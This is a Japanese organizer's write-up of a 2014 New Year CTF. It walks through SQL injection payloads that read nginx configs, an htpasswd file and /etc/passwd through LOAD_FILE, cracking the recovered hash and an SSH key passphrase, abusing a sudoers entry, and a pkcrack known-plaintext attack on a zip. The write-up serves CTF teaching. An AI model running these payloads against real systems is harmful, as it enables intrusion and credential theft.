年越しCTF x86-64.jp大会 2014 を開催しました

あけましておめでとうございます。くりすです。今年もよろしくお願いします。


さて、年越しCTF x86-64.jp大会 2014 なるイベントを開催しましたが、参加者のみなさま、お楽しみいただけましたでしょうか?

以下に、年越しCTF x86-64.jp大会 2014 問題の解説記事を記します。

もくじ

  1. ルール説明
  2. 問題解説
    1. 第1段階 - Webアプリケーション
    2. 第2段階 - サーバへの侵入
    3. 第3段階 - パスワード付きzipへの攻撃
  3. 優勝者紹介
  4. 苦労話その他エピソード等

1. ルール説明

はじめに、ルールをおさらいします。

ルールは簡単。ターゲットサーバ最深部にあるキーを入手し、提出するだけ。あらゆる手を尽くして構いません。

楽勝そうですね。では、いってみましょう。

2. 問題解説

第1段階 - Webアプリケーション

ルール説明に従ってhttp://target.ctf.x86-64.jp/にアクセスすると、「ほげ大学科目データベース」と称する、ネーミングが適当な大学の科目紹介ページに到着します。このページはPythonのFlaskというマイクロフレームワークを使って作られております。

さて、いくつかページ上のリンクをたどってみます。

http://target.ctf.x86-64.jp/show/GB10114

線形代数Iに関する科目説明が現れる

http://target.ctf.x86-64.jp/show/GB11911

データ構造とアルゴリズムに関する科目説明が現れる

といったふうに、URLのパスを直接パラメータとして扱っているようです。ここにSQLインジェクションを仕掛けてみましょう。

  1. まずは、UNION ALL SELECT null攻めをします。
    http://target.ctf.x86-64.jp/show/%27%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,@@VERSION;--
    
    このように、nullを10個と@@VERSIONを並べてUNIONクエリを発射すると、「備考」欄に5.5.34-0ubuntu0.12.04.1と出現し、SQLインジェクションの成功が確認できます。
  1. 次に、SQLインジェクションによってどんな操作が行えるか確認しましょう。
    http://target.ctf.x86-64.jp/show/%27%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,grantee,privilege_type,is_grantable%20FROM%20information_schema.user_privileges;--
    
    こうすると、kamokudb@localhost, FILE, NOという応答を得ます。FILE権限があるようですね。ローカルファイルインジェクションをやってみましょう。
  1. /etc/nginx/nginx.conf をMySQL経由で読み取ってみましょう。
    http://target.ctf.x86-64.jp/show/%27%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,LOAD_FILE(0x2f6574632f6e67696e782f6e67696e782e636f6e66);--
    
    こうすると、/etc/nginx/nginx.confを引っ張りだすことができます*1LOAD_FILE()の引数が16進数なのは、ASCIIのスラッシュが含まれるとパスと認識されて404 Not Foundという結果になってしまうからです。 その結果、nginx.confが備考欄に見事に出力され、/etc/nginx/conf.d/ctf.confというファイルをインクルードしていることを暴露します。
  1. /etc/nginx/conf.d/ctf.conf をMySQL経由で読み取る
    http://target.ctf.x86-64.jp/show/%27%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,LOAD_FILE(0x2f6574632f6e67696e782f636f6e662e642f6374662e636f6e66);--
    
    これにより、nginxで/adminが提供されており、さらに/etc/nginx/conf.d/admin.passwdの存在を知ります。
  1. /etc/nginx/conf.d/admin.passwd を読み取り、クラックする
    http://target.ctf.x86-64.jp/show/%27%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,LOAD_FILE(0x2f6574632f6e67696e782f636f6e662e642f61646d696e2e706173737764);--
    
    これにより、
    admin:$apr1$Zbv59eGR$GoMlmiqujrkVOgm8QbMcL/
    
    を得ます。John The Ripperでも使えばクラックできます。ちなみに、パスワードはmanukeです。

2. サーバへの侵入

これで、 http://target.ctf.x86-64.jp/admin への侵入が完了しました。次は、サーバ自体への侵入を行います。

/admin は、サーバのファイルシステムの/home/ctfを表示するファイルマネージャです。ご丁寧にドットファイル系もばっちり表示してくれるので簡単ですね。.bash_history (途中で問題都合で.zsh_historyになりました) を開きましょう。

wget https://www.dropbox.com/s/************/id_rsa

Dropboxに秘密鍵をアップロードするとかとんだお馬鹿さんですね。問答無用でダウンロードし、使ってみましょう。しかし、どのユーザに対する鍵か分からないし、そもそもこのid_rsaはパスワードがかかっています。

  1. まずは、id_rsaのパスワードを解きましょう。 よくあるパスワードを試したり、総当たり攻撃でパスワードを暴いたりすればいけます。たとえば、ssh-privkey-crackなるツールがあります*2。 パスワードはpwnedです。
  1. 誰に対して使えるキーか、見当をつけましょう。 またSQLインジェクションに戻ります。
    http://target.ctf.x86-64.jp/show/%27%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,LOAD_FILE(0x2f6574632f706173737764);--
    
    これは、/etc/passwdを表示するペイロードです。じっくり眺めてみると、chris, ctf-kamokudb, ctf, takashiあたりが狙えそうだということが分かります。

このキーが使えるアカウントは、ctfです。

  1. キーを探しましょう。 /home/ctf直下には偽物しかないので、どこか別のパスに隠されているはずです。/etc以下を調べると、/etc/sudoers.bakという、パーミッション444のファイルが見つかります。大当たりですね。
    ctf     ALL=(takashi) NOPASSWD: /bin/cat
    ctf     ALL=(takashi) NOPASSWD: /bin/ls
    
    たいへんよい。これらの権限を使えば、/home/takashi/Desktop/README.txtを見つけることは容易です。

このREADME.txtを読みます。

Impressive! You have reached the very depth of this server!

FINAL CHALLENGE: The key is right here... https://www.dropbox.com/s/qc7vo2o7ndmqu0n/lolz.zip
Download the zip file to your local machine and see what you can do. Good luck!

zipファイル中にキーが眠っているようです。

3. パスワード付きzip対する攻撃

先ほどダウンロードしたzipファイルを解凍してみましょう。できませんね。パスワードがかかっています。

でも、心配ご無用。なんとこのzipファイル、js/jquery.jsという、みなさんも容易に手に入れることができるファイルが一緒に保管されているのです。zipファイルの暗号は、選択平文攻撃という攻撃に対して脆弱であることが分かっており、実際に暗号化zipを解読するツールもあります。そのひとつが、pkcrackです。

(わたしがビルドしたときは)ちょっと人力パッチを当てる必要がありましたが、こいつを使えば、どんなに長いパスワードが使われていようと、zipの暗号を30秒ほどで解いてしまうことができるのです。

  1. クラックの準備をする zipに対する選択平文攻撃を行うためには、jquery.jsを同じアーカイブ方式、同じファイルシステムでzipに圧縮します。Linuxで zip jquery.zip jquery.jsを実行すれば大丈夫です。Windowsでやると失敗します。
  1. クラックする
    pkcrack -c js/jquery.js -p jquery.js -C lolz.zip -P ~/jquery.zip -d decrypted-lolz.zip
    
  1. 解読されたzipを解凍し、HERE_IS_THE_KEYを読み、キーをsubmitする。

註釈等

*1 本来はAppArmorによって保護されている部分ですが、CTFに供するためにわざと脆弱な設定を施しました。
*2 http://neophob.com/2007/10/ssh-private-key-cracker/


お疲れ様でした。以上が、年越しCTF x86-64.jp大会 2014の全容です。お楽しみいただけましたでしょうか!!

3. 正解者紹介

早着順(敬称略)です。

4. 苦労話、与太話

ここまでくるともう書くのだるいから箇条書きで。

  • .bash_history.zsh_history, ~/.ssh/authorized_keysを消されまくった
    • chattr +iして対処
  • uwsgiがハングした
    • supervisorctl restart allをcronで定期的に実行するようにした
  • /etc/sudoersを問題に盛り込もうとパーミッションを444にしたら、sudo自体が死んだ
    • /etc/sudoers.bakで代用

そんな感じですね。パーミッションがらみでミスってて、先にサーバに到達した参加者に妨害工作を受けたりしました。


ここまでのお付き合い、ありがとうございました。SECCON 2013 全国大会で、そしてtkbctf3で、また会いましょう。

The End

Comments

No comments.